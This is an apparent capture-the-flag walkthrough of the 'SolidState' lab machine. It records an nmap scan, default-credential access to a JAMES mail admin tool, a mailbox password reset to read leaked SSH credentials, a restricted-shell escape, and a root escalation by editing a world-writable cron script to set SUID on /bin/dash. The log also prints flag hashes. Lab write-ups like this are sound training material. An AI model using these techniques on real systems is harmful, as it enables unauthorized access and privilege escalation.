Machine-Name  :  SolidState
IP-Address    :  10.129.94.127

Command-Line: nmap -A 10.129.94.127
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-01 04:19 EST
    Nmap scan report for 10.129.94.127
    Host is up (0.052s latency).
    Not shown: 995 closed ports
    PORT    STATE SERVICE VERSION
    22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
    | ssh-hostkey:
    |   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
    |   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
    |_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
    25/tcp  open  smtp?
    |_smtp-commands: Couldn't establish connection on port 25
    80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
    |_http-server-header: Apache/2.4.25 (Debian)
    |_http-title: Home - Solid State Security
    110/tcp open  pop3?
    119/tcp open  nntp?
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    TCP/IP fingerprint:
    OS:SCAN(V=7.91%E=4%D=2/1%OT=22%CT=1%CU=34182%PV=Y%DS=2%DC=T%G=Y%TM=6017C931
    OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS(
    OS:O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11
    OS:NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
    OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
    OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
    OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
    OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
    OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
    OS:S)

    Network Distance: 2 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    TRACEROUTE (using port 554/tcp)
    HOP RTT      ADDRESS
    1   51.80 ms 10.10.14.1
    2   52.66 ms 10.129.94.127

    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 380.12 seconds


Command-Line: nmap -p- -T5 10.129.94.127
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-01 04:47 EST
Nmap scan report for 10.129.94.127
Host is up (0.052s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
110/tcp  open  pop3
119/tcp  open  nntp
4555/tcp open  rsip

Nmap done: 1 IP address (1 host up) scanned in 112.52 seconds



Command-Line: nc 10.129.94.127 4555
Result:
    JAMES Remote Administration Tool 2.3.2
    Please enter your login and password
    Login id:
    root
    Password:
    root
    Welcome root. HELP for a list of commands
    help
    Currently implemented commands:
Command: help                                    display this help
    listusers                               display existing accounts
    countusers                              display the number of existing accounts
    adduser [username] [password]           add a new user
    verify [username]                       verify if specified user exist
    deluser [username]                      delete existing user
    setpassword [username] [password]       sets a user's password
    setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
    showalias [username]                    shows a user's current email alias
    unsetalias [user]                       unsets an alias for 'user'
    setforwarding [username] [emailaddress] forwards a user's email to another email address
    showforwarding [username]               shows a user's current email forwarding
    unsetforwarding [username]              removes a forward
    user [repositoryname]                   change to another user repository
    shutdown                                kills the current JVM (convenient when James is run as a daemon)
    quit                                    close connection
Command: listusers
    Existing accounts 5
    user: james
    user: thomas
    user: john
    user: mindy
    user: mailadmin
Command: setpassword mindy password123


Command-Line: telnet 10.129.94.127 110
Result:
    Trying 10.129.94.127...
    Connected to 10.129.94.127.
    Escape character is '^]'.
    +OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
command: USER mindy
    +OK
command: PASS password123
    +OK Welcome mindy
    list
    +OK 2 1945
    1 1109
    2 836
    .
command: ret 2
    -ERR
command: RET 2
    -ERR
command: list
    +OK 2 1945
    1 1109
    2 836
    .
command: RETR 2
    +OK Message follows
    Return-Path: <mailadmin@localhost>
    Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
    MIME-Version: 1.0
    Content-Type: text/plain; charset=us-ascii
    Content-Transfer-Encoding: 7bit
    Delivered-To: mindy@localhost
    Received: from 192.168.11.142 ([192.168.11.142])
              by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
              for <mindy@localhost>;
              Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
    Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
    From: mailadmin@localhost
    Subject: Your Access

    Dear Mindy,


    Here are your ssh credentials to access the system. Remember to reset your password after your first login.
    Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

    username: mindy
    pass: P@55W0rd1!2@

    Respectfully,
    James


Command-Line: ssh mindy@solidstate.htb
Password: P@55W0rd1!2@
Result: *** REVERSE SHELL ***
    *** USER ACCESS ***

mindy@solidstate:~$ cat user.txt
Result: 0510e71c2e8c9cb333b36a38080d0dc2
    *** USER OWNED ***


Notes: mindy user is unable to use a bash shell. Exiting the ssh connection.

Command-Line: ssh 10.129.94.127@solidstate.htb -t "bash --noprofile"
Result: ${debian_chroot:+($debian_chroot)}mindy@solidstate:~$


Notes: Running LinEnum.sh
Result:
    [-] World-writable files (excluding /proc and /sys):
    -rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py
Notes: Found a file that is "writable" by "everyone" (777).


${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt/$ which dash
Result: /bin/dash

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt/$ nano tmp.py
    import os
    import sys
    try:
        os.system('chmod 4755 /bin/dash')
    except:
        sys.exit()
Notes: Removed the 'rm -r /tmp/*', and replaced with 'chmod 4755 /bin/dash' from os.system().
${debian_chroot:+($debian_chroot)}mindy@solidstate:/$ dash
Notes: Waited until updated.
Result: *** ROOT ACCESS ***
    #
    
# cat /root/root.txt
Result: 4f4afb55463c3bc79ab1e906b074953d
    *** ROOT OWNED ***

      *** FINISHED ***
